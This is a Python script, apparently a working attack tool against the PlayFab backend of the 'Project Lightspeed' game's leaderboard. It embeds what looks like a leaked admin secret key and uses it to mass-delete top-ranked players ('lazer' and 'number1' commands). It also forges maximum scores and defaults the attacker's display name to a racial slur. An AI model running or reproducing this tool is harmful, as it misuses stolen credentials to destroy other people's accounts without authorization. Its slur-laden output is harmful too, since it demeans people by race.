Project Lightspeed (lightspeedchallenge.co.uk pwn)

1. # After all the mistakes Logitech has made, I've decided to make this to raise awareness..
2. #
3. # ___ .
4. # / / __ /
5. # /__/ / __ / ___ __ -/- Destroying leaderboards
6. # / / / / / /__/ / / since December 2019
7. # / / /__/ __/ /__ /__ /
8. #
9. # / .
10. # / / /
11. # / / ___ /__ -/- ____ __ ___ ___ /
12. # / / /__/ / / / /___ /__/ /__/ /__/ ___/
13. # /___ / ___/ / / / ____/ / /__ /__ /__/
14. # version 1.0
15. #
16. # Features:
17. # Perform admin actions
18. # Delete users
19. # More!
20.  
21.  
22. banner = """
23. __ .
24. / / __ /
25. /__/ / __ / ___ __ -/- Destroying leaderboards
26. / / / / / /__/ / / since December 2019
27. / / /__/ __/ /__ /__ /
28.  
29. / .
30. / / /
31. / / ___ /__ -/- ____ __ ___ ___ /
32. / / /__/ / / / /___ /__/ /__/ /__/ ___/
33. /___ / ___/ / / / ____/ / /__ /__ /__/
34. """
35. help = """
36. session: Get a session.
37. setname: Set your name.
38. setscore: Set your score (up to 2**31-1).
39. """
40. import requests, json, uuid
41. secret_key = "TCSI8KXDHUX8FR617Q4XE3F68PJFW1BPH5TGNRQHQ7Q4AG7ERS"
42. url = "https://3860f.playfabapi.com/"
43. title_id = "3860F"
44. res_urls = {
45. "WordFilter": "https://lightspeedchallenge.co.uk/game/bin/data/word_filter.json",
46. "Code": "https://lightspeedchallenge.co.uk/game/main.js",
47. "Targets": "https://lightspeedchallenge.co.uk/game/bin/data/targets_data.json",
48. "Assets": "https://lightspeedchallenge.co.uk/game/bin/data/asset_pack.json",
49. "Config": "https://lightspeedchallenge.co.uk/game/config.json",
50. "DOM": "https://lightspeedchallenge.co.uk/game/bin/data/dom_classes.json"
51. }
52. word_filter = "";
53. session = "";
54. id = "";
55.  
56. cli_base = "https://3860f.playfabapi.com/Client/"
57. adm_base = "https://3860f.playfabapi.com/Admin/"
58. sdk = "JavaScriptSDK-1.55.191015"
59. def clienturl(method):
60. return cli_base + method + "?sdk=" + sdk
61. def adminurl(method):
62. return adm_base + method + "?sdk=" + sdk
63. def initialize():
64. word_filter = json.loads(requests.get(res_urls["WordFilter"]).text)
65.  
66. def init_session():
67. id = str(uuid.uuid4())
68. object = {
69. "TitleId": "3860F",
70. "CustomId": id,
71. "CreateAccount": True
72. }
73. resp = json.loads(requests.post(clienturl("LoginWithCustomID"), json = object).text)
74. if resp['code'] != 200:
75. raise Exception("Got error code {}".format(resp['code']))
76. else:
77. global uid
78. uid = resp['data']['PlayFabId']
79. session = resp['data']['SessionTicket']
80. return session
81.  
82. def setScore(score):
83. if session is None:
84. raise Exception("Authentication required")
85. else:
86. object = {
87. "Statistics": [
88. {
89. "StatisticName": "highscoresWeekly",
90. "Value": score
91. },
92. {
93. "StatisticName": "highscores",
94. "Value": score
95. }
96. ]
97. }
98. resp = json.loads(requests.post(clienturl("UpdatePlayerStatistics"), headers={"X-Authentication":session},json = object).text)
99. if resp['code'] != 200:
100. raise Exception("Got error code {}".format(resp['code']))
101. else:
102. return resp
103.  
104. def setSession(sess):
105. global session
106. session = sess
107. def setName(name):
108. if session is None:
109. raise Exception("Authentication required")
110. else:
111. object = {
112. "DisplayName": name
113. }
114. resp = json.loads(requests.post(clienturl("UpdateUserTitleDisplayName"), json = object, headers={"X-Authorization":session}).text)
115. if resp['code'] != 200:
116. raise Exception("Got error code {}".format(resp['code']))
117. else:
118. global uname
119. uname = name
120. return resp
121.  
122. def leaderboardCmd(count):
123. object = {
124. "TitleId":"3860F",
125. "StatisticName":"highscoresWeekly",
126. "StartPosition":0,
127. "MaxResultsCount":count
128. }
129. resp = json.loads(requests.post(clienturl("GetLeaderboard"), json = object, headers={"X-Authentication":session,"X-PlayFabSDK": sdk,"Referer":"https://lightspeedchallenge.co.uk/game/"}).text)
130. if resp['code'] != 200:
131. raise Exception("Got error code {}".format(resp['code']))
132. else:
133. return resp
134. def deleteUser(uid):
135. object = {
136. "PlayFabId": uid
137. }
138. resp = json.loads(requests.post(adminurl("DeletePlayer"), json = object, headers={"X-SecretKey":secret_key,"X-PlayFabSDK": sdk}).text)
139. if resp['code'] != 200:
140. raise Exception("Got error code {}".format(resp['code']))
141. else:
142. return resp
143. xprompt = "dev@lightspeedchallenge.co.uk:/pwn#"
144. def __parse(cmd):
145. if cmd.startswith("session"):
146. try:
147. global session
148. session = init_session()
149. except Exception as e:
150. print("Error: {}".format(e))
151. if session is None:
152. print("Something went wrong, we don't have a session. Try that again.")
153. else:
154. print("We have a session: {}".format(session))
155. elif cmd.startswith("setname"):
156. z = cmd.split(" ")
157. n = ""
158. if len(z) < 2:
159. print("You need a name for that.")
160. return
161. else:
162. n = " ".join(z[1:])
163. if session is None:
164. print("You need a session to do this.")
165. return
166. else:
167. try:
168. setName(n)
169. except Exception as e:
170. print("Error: {}".format(e))
171. elif cmd.startswith("setscore"):
172. z = cmd.split(" ")
173. s = 0
174. if len(z) < 2:
175. print("You need a score for that.")
176. return
177. else:
178. s = int(z[1])
179. if session is None:
180. print("You need a session to do this.")
181. return
182. else:
183. try:
184. setScore(s)
185. except Exception as e:
186. print("Error: {}".format(e))
187. elif cmd.startswith("deluser"):
188. z = cmd.split(" ")
189. i = 0
190. if len(z) < 2:
191. print("You need a PlayFab ID for that.")
192. return
193. else:
194. i = z[1]
195. try:
196. deleteUser(i)
197. except Exception as e:
198. print("Error: {}".format(e))
199. elif cmd.startswith("exit"):
200. print("Bye!")
201. exit()
202. elif cmd.startswith("leaderboard"):
203. if session is None:
204. print("You need a session to do this.")
205. return
206. if len(cmd.split(" ")) >= 2:
207. a = int(cmd.split(" ")[1])
208. else:
209. a = 10
210. z = leaderboardCmd(a)
211. y = z["data"]["Leaderboard"]
212. for x in y:
213. print("PlayFab ID: {}".format(x["PlayFabId"]))
214. print("Display Name: {}".format(x["DisplayName"]))
215. print("Score: {}".format(x["StatValue"]))
216. print("Position: {}".format(x["Position"]+1))
217. print("-----")
218. elif cmd.startswith("setsess"):
219. x = cmd.split(" ")
220. if len(x) < 2:
221. print("Please supply a session ticket.")
222. return
223. setSession(x[1])
224. elif cmd.startswith("number1"):
225. if session is None:
226. print("You need a session to do this.")
227. return
228. if uname is None:
229. print("You don't have a name: defaulting to niggers1")
230. setName("niggers1")
231. setScore(2147483647)
232. z = leaderboardCmd(100)
233. y = z["data"]["Leaderboard"]
234. for x in y:
235. if x["PlayFabId"] == uid:
236. print("Oh, it's me! {} (name: {}, score: {}, place: {})".format(x["PlayFabId"],x["DisplayName"],x["StatValue"],x["Position"]+1))
237. break
238. else:
239. print("Firing lazer at {} (name: {}, score: {}, place: {})".format(x["PlayFabId"],x["DisplayName"],x["StatValue"],x["Position"]+1))
240. deleteUser(x["PlayFabId"])
241. elif cmd.startswith("help") or cmd.startswith("?"):
242. print(help)
243. elif cmd.startswith("lazer"):
244. if session is None:
245. print("You need a session to do this.")
246. return
247. if len(cmd.split(" ")) >= 2:
248. a = int(cmd.split(" ")[1])
249. else:
250. a = 10
251. print("Lazer time: nuking {} users".format(a))
252. z = leaderboardCmd(a)
253. y = z["data"]["Leaderboard"]
254. for x in y:
255. print("Firing lazer at {} (name: {}, score: {}, place: {})".format(x["PlayFabId"],x["DisplayName"],x["StatValue"],x["Position"]+1))
256. deleteUser(x["PlayFabId"])
257. else:
258. print("That command doesn't exist. Type help or ? to get more information.")
259. def __console():
260. while True:
261. cmd = input("{} ".format(xprompt))
262. __parse(cmd)
263.  
264. print(banner)
265. __console()